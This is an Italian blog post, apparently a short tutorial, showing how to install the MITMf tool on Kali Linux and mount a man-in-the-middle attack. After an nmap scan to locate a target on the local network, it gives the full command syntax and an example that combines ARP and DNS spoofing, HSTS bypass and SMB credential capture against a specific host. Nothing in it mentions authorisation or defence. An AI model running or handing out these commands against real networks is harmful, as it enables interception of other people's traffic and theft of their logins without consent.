Ciao a tutti cari amici di iProg era da parecchio che non scrivevo un articolo, ma purtroppo sono stato molto occupato in questo periodo. Qualche tempo fa vi accennai in cosa consiste un attacco di tipo man in the middle, oggi vorrei mostrarvi un tool straordinario che si chiama mitmf ed è reperibile su github. Se avete una versione di kali linux installata potete installare il tool semplicemente digitando all’interno del terminale il seguente comando:
apt-get install mitmf
A questo punto possiamo entrare in azione, quindi per prima cosa mappiamo il nostro network tramite l'utilizzo di nmap nmap -sP -T4 192.168.1.1/24 Ora che abbiamo individuato il nostro target possiamo sferrare il nostro attacco, quindi la sintassi del comando è:
python mitmf.py -i interfaccia –hsts –spoof –arp –dns –gateway indirizzoDelGateway –target indirizzoDelTarget
Esempio
python mitmf.py -i eth1 –hsts –spoof –arp –dns –smbauth –gateway 192.168.1.1 –target 192.168.1.4
L’unica pecca di questo fantastico tool che funziona solo con alcuni tipi di browser tuttavia mi aspetto degli sviluppi interessanti in quanto il tool è ancora in fase di testing.